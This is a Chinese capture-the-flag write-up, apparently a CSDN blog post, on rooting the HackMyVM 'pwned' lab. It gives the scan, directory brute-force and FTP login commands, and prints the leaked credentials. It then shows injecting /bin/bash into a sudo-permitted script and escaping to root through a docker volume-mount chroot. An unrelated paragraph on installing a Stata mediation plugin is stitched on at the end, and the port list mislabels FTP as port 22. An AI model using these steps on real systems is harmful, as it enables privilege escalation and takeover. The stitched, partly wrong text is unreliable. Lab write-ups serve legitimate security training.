hackmyvm-pwned靶机

主机发现

sudo arp-scan -l

 扫描并列出本地主机ip

发现主机ip: 192.168.71.169

nmap 192.168.71.169

 nmap扫描开放端口

22 ftp文件传输协议端口

22 ssh远程连接协议端口

80 web服务页面端口

 

查看web页面收集信息

查看页面元素,发现下面有一段提示信息

目录爆破

sudo gobuster dir -u http://192.168.71.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

爆破出来了两个目录

分别查看一下

 

 两个链接,第一个是返回到主页面了,第二个里面是一句话,提示信息

 

查看第二个目录

也是一个跳转链接

还有一个存放着一些目录,很像字典

敏感信息收集

打开看看

wget 下载这个目录下的字典到本地,在用字典跑一下目录,发现有一个敏感目录

 见名知意,发现可能是ftp的用户名和密码,登录上去看看

ftp登录信息

<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
?>

 查看到有两个文件,全都get 下载到本地,id_rsa,应该是ssh的密钥

 查看note.txt 用户名应该是ariana,尝试一下,登录之前别忘了给chmod 600 id_rsa 加个权限

我已经提前加好了。 

ssh登录

ariana@pwned:~$ ls
ariana-personal.diary  user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana 

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

第一个user1 flag拿到了

提权

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

发现用selena 用户执行messenger.sh不用给权限

进入当前目录执行它

sudo -u selena ./messenger.sh 

Welcome to linux.messenger                                                                                                                   10:52:08 [0/0]
                                                                             
                                                                             
ariana:                                                                      
selena:                                                                      
ftpuser:                                                                     
                   
Enter username to send message : selena                          
                   
Enter message for selena :/bin/bash                                          
                   
Sending message to selena 
id                                                                           
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
pwd                                                                          
/home                                                                        
whoami                                                                       
selena        
python3 -c "import pty;pty.spawn('/bin/bash');"
selena@pwned:/home$ ls
ariana  ftpuser  messenger.sh  selena 
selena@pwned:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cd /root                                                                   
# cat root.txt                        
4d4098d64e163d2726959455d046fd7c                                             
                                      
                                                                             

You found me. i dont't expect this (◎ . ◎)
                                                                             
I am Ajay (Annlynn) i hacked your server left and this for you.              
                                                                             
I trapped Ariana and Selena to takeover your server :)
                                                                             

You Pwned the Pwned congratulations :) 

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker

 选择当前用户,执行bash ,拿到当前用户的shell,发现用户另一个属组是docker,先使用pyhon建立一个临时的shell再使用这个docker脚本反弹最终shell,切换根目录拿到root

"sgmediation.zip" 是一个包含 UCLA(加利福尼亚大学洛杉矶分校)开发的 sgmediation 插件的压缩包。该插件专为统计分析软件 Stata 设计,用于进行中介效应分析。在社会科学、心理学、市场营销等领域,中介效应分析是一种关键的统计方法,它帮助研究人员探究变量之间的因果关系,尤其是中间变量如何影响因变量与自变量之间的关系。Stata 是一款广泛使用的统计分析软件,具备众多命令和用户编写的程序来拓展其功能,sgmediation 插件便是其中之一。它能让用户在 Stata 中轻松开展中介效应分析,无需编写复杂代码。 下载并解压 "sgmediation.zip" 后,需将解压得到的 "sgmediation" 文件移至 Stata 的 ado 目录结构中。ado(ado 目录并非“adolescent data organization”缩写,而是 Stata 的自定义命令存放目录)目录是 Stata 存放自定义命令的地方,应将文件放置于 "ado\base\s" 子目录下。这样,Stata 启动时会自动加载该目录下的所有 ado 文件,使 "sgmediation" 命令在 Stata 命令行中可用。 使用 sgmediation 插件的步骤如下:1. 安装插件:将解压后的 "sgmediation" 文件放入 Stata 的 ado 目录。如果 Stata 安装路径是 C:\Program Files\Stata\ado\base,则需将文件复制到 C:\Program Files\Stata\ado\base\s。2. 启动 Stata:打开 Stata,确保软件已更新至最新版本,以便识别新添加的 ado 文件。3. 加载插件:启动 Stata 后,在命令行输入 ado update sgmediation,以确保插件已加载并更新至最新版本。4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值